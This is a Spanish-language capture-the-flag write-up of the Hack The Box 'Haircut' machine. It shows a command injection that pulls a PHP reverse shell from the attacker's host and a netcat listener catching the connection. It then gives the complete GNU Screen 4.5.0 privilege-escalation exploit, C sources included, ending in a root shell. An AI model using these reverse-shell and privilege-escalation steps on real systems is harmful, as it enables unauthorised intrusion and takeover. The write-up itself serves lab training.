Como siempre empezamos con NMAP
root@Kali2:~/Desktop# nmap -sC -sV 10.10.10.24 Starting Nmap 7.70 ( https://nmap.org ) at 2019-10-27 14:04 CET Nmap scan report for 10.10.10.24 Host is up (0.031s latency). Not shown: 998 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 e9:75:c1:e4:b3:63:3c:93:f2:c6:18:08:36:48:ce:36 (RSA) | 256 87:00:ab:a9:8f:6f:4b:ba:fb:c6:7a:55:a8:60:b2:68 (ECDSA) |_ 256 b6:1b:5c:a9:26:5c:dc:61:b7:75:90:6c:88:51:6e:54 (ED25519) 80/tcp open http nginx 1.10.0 (Ubuntu) |_http-server-header: nginx/1.10.0 (Ubuntu) |_http-title: HTB Hairdresser Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 14.52 seconds
Un poco de dirbuster
Podemos ver la carpeta de uploads y un lugar para inyectar comandos.
10.10.14.26:8000/php-reverse-shell.php -o uploads/reverse.php
Yendo a http://10.10.10.24/uploads/reverse.php
Y usando la reverse tcp shell que viene con Kali tienes una reverse shell
root@Kali2:~/Desktop# nc -lvnp 1234 listening on [any] 1234 ... connect to [10.10.14.26] from (UNKNOWN) [10.10.10.24] 51748 Linux haircut 4.4.0-78-generic #99-Ubuntu SMP Thu Apr 27 15:29:09 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux 15:16:02 up 1:17, 0 users, load average: 0.00, 0.00, 0.00 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT uid=33(www-data) gid=33(www-data) groups=33(www-data) /bin/sh: 0: can't access tty; job control turned off $ ^[[D^[[A^[[C^[[B /bin/sh: 1: : not found $ python3 -c 'import pty;pty.spawn("/bin/bash");' www-data@haircut:/$ ^Z [1]+ Stopped nc -lvnp 1234 root@Kali2:~/Desktop# stty raw -echo root@Kali2:~/Desktop# nc -lvnp 1234 www-data@haircut:/$ ls
Con Lineum tenemos
[-] SUID files: -rwsr-xr-x 1 root root 142032 Jan 28 2017 /bin/ntfs-3g -rwsr-xr-x 1 root root 44680 May 7 2014 /bin/ping6 -rwsr-xr-x 1 root root 30800 Jul 12 2016 /bin/fusermount -rwsr-xr-x 1 root root 40128 May 4 2017 /bin/su -rwsr-xr-x 1 root root 40152 Dec 16 2016 /bin/mount -rwsr-xr-x 1 root root 44168 May 7 2014 /bin/ping -rwsr-xr-x 1 root root 27608 Dec 16 2016 /bin/umount -rwsr-xr-x 1 root root 136808 Jan 20 2017 /usr/bin/sudo -rwsr-xr-x 1 root root 23376 Jan 18 2016 /usr/bin/pkexec -rwsr-xr-x 1 root root 32944 May 4 2017 /usr/bin/newuidmap -rwsr-xr-x 1 root root 39904 May 4 2017 /usr/bin/newgrp -rwsr-xr-x 1 root root 32944 May 4 2017 /usr/bin/newgidmap -rwsr-xr-x 1 root root 75304 May 4 2017 /usr/bin/gpasswd -rwsr-sr-x 1 daemon daemon 51464 Jan 14 2016 /usr/bin/at -rwsr-xr-x 1 root root 54256 May 4 2017 /usr/bin/passwd -rwsr-xr-x 1 root root 1588648 May 19 2017 /usr/bin/screen-4.5.0 -rwsr-xr-x 1 root root 40432 May 4 2017 /usr/bin/chsh -rwsr-xr-x 1 root root 49584 May 4 2017 /usr/bin/chfn -rwsr-xr-x 1 root root 38984 Mar 7 2017 /usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic -rwsr-xr-- 1 root messagebus 42992 Jan 12 2017 /usr/lib/dbus-1.0/dbus-daemon-launch-helper -rwsr-xr-x 1 root root 208680 Apr 29 2017 /usr/lib/snapd/snap-confine -rwsr-xr-x 1 root root 10232 Mar 27 2017 /usr/lib/eject/dmcrypt-get-device -rwsr-xr-x 1 root root 428240 Mar 16 2017 /usr/lib/openssh/ssh-keysign -rwsr-xr-x 1 root root 14864 Jan 18 2016 /usr/lib/policykit-1/polkit-agent-helper-1
Lo más interesante (y raro es)
root@Kali2:~/Desktop# searchsploit screen 4.5 -------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------------- Exploit Title | Path | (/usr/share/exploitdb/) -------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------------- GNU Screen 4.5.0 - Local Privilege Escalation | exploits/linux/local/41154.sh GNU Screen 4.5.0 - Local Privilege Escalation (PoC) | exploits/linux/local/41152.txt -------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------------- Shellcodes: No Result
Entender el exploit es moderadamente sencillo (y era el punto de esta maquina)
Como el exploit no funciona vamos a tener que hacerlo a mano empezando por compilar (siguiendo las intrucciones del exploit) y desde nuestra kali
root@Kali2:~/Desktop# cat << EOF > /tmp/libhax.c > #include <stdio.h> > #include <sys/types.h> > #include <unistd.h> > __attribute__ ((__constructor__)) > void dropshell(void){ > chown("/tmp/rootshell", 0, 0); > chmod("/tmp/rootshell", 04755); > unlink("/etc/ld.so.preload"); > printf("[+] done!\n"); > } > EOF root@Kali2:~/Desktop# gcc -fPIC -shared -ldl -o /tmp/libhax.so /tmp/libhax.c /tmp/libhax.c: In function ‘dropshell’: /tmp/libhax.c:7:5: warning: implicit declaration of function ‘chmod’ [-Wimplicit-function-declaration] 7 | chmod("/tmp/rootshell", 04755); | ^~~~~ root@Kali2:~/Desktop# cat << EOF > /tmp/rootshell.c > #include <stdio.h> > int main(void){ > setuid(0); > setgid(0); > seteuid(0); > setegid(0); > execvp("/bin/sh", NULL, NULL); > } > EOF root@Kali2:~/Desktop# gcc -o /tmp/rootshell /tmp/rootshell.c /tmp/rootshell.c: In function ‘main’: /tmp/rootshell.c:3:5: warning: implicit declaration of function ‘setuid’ [-Wimplicit-function-declaration] 3 | setuid(0); | ^~~~~~ /tmp/rootshell.c:4:5: warning: implicit declaration of function ‘setgid’ [-Wimplicit-function-declaration] 4 | setgid(0); | ^~~~~~ /tmp/rootshell.c:5:5: warning: implicit declaration of function ‘seteuid’ [-Wimplicit-function-declaration] 5 | seteuid(0); | ^~~~~~~ /tmp/rootshell.c:6:5: warning: implicit declaration of function ‘setegid’ [-Wimplicit-function-declaration] 6 | setegid(0); | ^~~~~~~ /tmp/rootshell.c:7:5: warning: implicit declaration of function ‘execvp’ [-Wimplicit-function-declaration] 7 | execvp("/bin/sh", NULL, NULL); | ^~~~~~ /tmp/rootshell.c:7:5: warning: too many arguments to built-in function ‘execvp’ expecting 2 [-Wbuiltin-declaration-mismatch] root@Kali2:~/Desktop# cd /tmp/ root@Kali2:/tmp# python -m SimpleHTTPServer 8000 Serving HTTP on 0.0.0.0 port 8000 ... 10.10.10.24 - - [27/Oct/2019 15:31:54] "GET /rootshell HTTP/1.1" 200 - 10.10.10.24 - - [27/Oct/2019 15:32:02] "GET /libhax.so HTTP/1.1" 200 -
Ahora desde Haircut
www-data@haircut:/dev/shm$ cd /tmp/ www-data@haircut:/tmp$ wget 10.10.14.26:8000/rootshell --2019-10-27 15:31:54-- http://10.10.14.26:8000/rootshell Connecting to 10.10.14.26:8000... connected. HTTP request sent, awaiting response... 200 OK Length: 16832 (16K) [application/octet-stream] Saving to: 'rootshell' rootshell 100%[===================>] 16.44K --.-KB/s in 0.02s 2019-10-27 15:31:54 (858 KB/s) - 'rootshell' saved [16832/16832] www-data@haircut:/tmp$ wget 10.10.14.26:8000/libhax.so --2019-10-27 15:32:02-- http://10.10.14.26:8000/libhax.so Connecting to 10.10.14.26:8000... connected. HTTP request sent, awaiting response... 200 OK Length: 16144 (16K) [application/octet-stream] Saving to: 'libhax.so' libhax.so 100%[===================>] 15.77K --.-KB/s in 0.02s 2019-10-27 15:32:02 (718 KB/s) - 'libhax.so' saved [16144/16144] cd /etc umask 000 # because screen -D -m -L ld.so.preload echo -ne "\x0a/tmp/libhax.so" # newline needed screen -ls # screen itself is setuid, so... /tmp/rootshell www-data@haircut:/etc$ /tmp/rootshell # whoami root # cat user.txt 0b0da2af50e9ab... # cat root.txt 4cfa26d84b22208...
Y como no teniamos esta maquina ya la agregamos a HTB 🙂